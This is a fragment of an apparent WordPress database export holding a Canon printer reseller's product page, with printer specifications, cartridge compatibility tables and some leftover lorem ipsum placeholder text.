Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-24 09:58:10','2018-12-24 01:58:10','',1449,'https://bintara.com.my/blog/2018/12/24/1449-revision-v1/',0,'revision','',0),(3338,1,'2019-09-25 11:28:14','2019-09-25 03:28:14','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 